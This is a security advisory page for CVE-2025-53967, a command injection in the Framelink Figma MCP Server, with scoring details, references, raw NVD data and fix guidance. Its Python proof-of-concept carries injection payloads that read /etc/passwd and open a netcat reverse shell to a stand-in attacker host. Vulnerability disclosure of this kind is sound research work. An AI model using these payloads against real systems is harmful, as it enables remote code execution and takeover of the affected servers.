Security Vulnerability Report
CVE-2025-53967 CVSS 8.0 HIGH


Published: 2025-10-08 17:15:35
Last Modified: 2026-04-15 00:35:42

Description

Framelink Figma MCP Server before 0.6.3 allows an unauthenticated remote attacker to execute arbitrary operating system commands via a crafted HTTP POST request with shell metacharacters in input that is used by a fetchWithRetry curl command. The vulnerable endpoint fails to properly sanitize user-supplied input, enabling the attacker to inject malicious commands that are executed with the privileges of the MCP process. Exploitation requires network access to the MCP interface.

CVSS Details

CVSS Score: 8.0
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N
Decoded: Attack Vector Adjacent Network, Attack Complexity High, Privileges Required None, User Interaction None, Scope Changed, Confidentiality High, Integrity High, Availability None (exploitability subscore 1.6, impact subscore 5.8; metric type Secondary).

Note that the vector scores the attack vector as Adjacent rather than Network: the score assumes the attacker already has network reach to the MCP listener, which is what the description's last sentence ("requires network access to the MCP interface") states. Where the server is bound to an interface an attacker can reach, no authentication is needed and the outcome is arbitrary command execution as the MCP process.

Configurations (Affected Products)

No CPE configuration data is published for this entry (NVD vulnStatus: Deferred).

Affected product, per the description and references: Framelink Figma MCP Server (Figma-Context-MCP) < 0.6.3. Fixed in v0.6.3.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53967 - Framelink Figma MCP Server RCE PoC
# Vulnerability: Command Injection via fetchWithRetry curl command
# Affected: Figma-Context-MCP < v0.6.3
#
# The endpoint path and JSON field names below are this PoC's assumptions;
# adjust them to the target's actual MCP HTTP transport before use.
import requests

# Target MCP server endpoint
TARGET_URL = "http://target-mcp-server:3000/fetch"

# Malicious payload with shell metacharacters for command injection.
# $(...) is expanded by the shell even inside double quotes, so the injected
# command runs before curl ever sees the URL.
PAYLOAD = {
    "url": "http://example.com/api/$(id > /tmp/pwned.txt)",
    "retryCount": 3,
}

# Alternative payloads using different injection techniques.
# Against the double-quoted curl invocation shown at the bottom of this file,
# only the $(...) and backtick forms break out of the quotes; the ';' and '|'
# forms only work if the URL is interpolated into the command unquoted.
PAYLOAD_BACKTICK = {
    "url": "http://example.com/`whoami > /tmp/pwned.txt`",
    "retryCount": 3,
}
PAYLOAD_SEMICOLON = {
    "url": "http://example.com/; cat /etc/passwd > /tmp/pwned.txt",
    "retryCount": 3,
}
PAYLOAD_PIPE = {
    "url": "http://example.com/ | nc attacker.com 4444 -e /bin/sh",
    "retryCount": 3,
}


def exploit(target_url, payload):
    """
    Send a crafted HTTP POST request to trigger command injection in the
    fetchWithRetry function's curl command.
    """
    headers = {
        "Content-Type": "application/json",
        "Accept": "application/json",
    }
    try:
        response = requests.post(
            target_url,
            json=payload,
            headers=headers,
            timeout=10,
        )
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {response.text[:500]}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None


if __name__ == "__main__":
    print(f"[*] Targeting: {TARGET_URL}")
    print("[*] Sending command injection payload...")
    exploit(TARGET_URL, PAYLOAD)
    print("[*] Check /tmp/pwned.txt on target for command execution evidence")

# Vulnerable code reference (src/utils/fetch-with-retry.ts at the commit cited by NVD):
#   const { stdout } = await execAsync(`curl -s -f "${url}"`);  // VULNERABLE - URL interpolated into a shell command
#
# Quoting alone is not a fix: wrapping the URL in double quotes (for example
# via JSON.stringify) still lets a POSIX shell expand $(...) and backticks
# inside the quotes. The robust fix is to avoid the shell entirely and pass
# the URL as a single argv element, e.g. execFile("curl", ["-s", "-f", "--", url]).
# See the v0.6.3 release referenced by NVD for the project's actual change.

References

https://github.com/GLips/Figma-Context-MCP/blob/96b3852669c5eed65e4a6e20406c25504d9196f2/src/utils/fetch-with-retry.ts#L34 (vulnerable fetchWithRetry source at the pre-fix commit)
https://github.com/GLips/Figma-Context-MCP/releases/tag/v0.6.3 (fixed release)
https://www.imperva.com/blog/another-critical-rce-discovered-in-a-popular-mcp-server/ (Imperva write-up)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-53967",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-08T17:15:34.507",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Framelink Figma MCP Server before 0.6.3 allows an unauthenticated remote attacker to execute arbitrary operating system commands via a crafted HTTP POST request with shell metacharacters in input that is used by a fetchWithRetry curl command. The vulnerable endpoint fails to properly sanitize user-supplied input, enabling the attacker to inject malicious commands that are executed with the privileges of the MCP process. Exploitation requires network access to the MCP interface."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
            "baseScore": 8.0,
            "baseSeverity": "HIGH",
            "attackVector": "ADJACENT_NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.8
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-420"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/GLips/Figma-Context-MCP/blob/96b3852669c5eed65e4a6e20406c25504d9196f2/src/utils/fetch-with-retry.ts#L34",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/GLips/Figma-Context-MCP/releases/tag/v0.6.3",
        "source": "[email protected]"
      },
      {
        "url": "https://www.imperva.com/blog/another-critical-rce-discovered-in-a-popular-mcp-server/",
        "source": "[email protected]"
      }
    ]
  }
}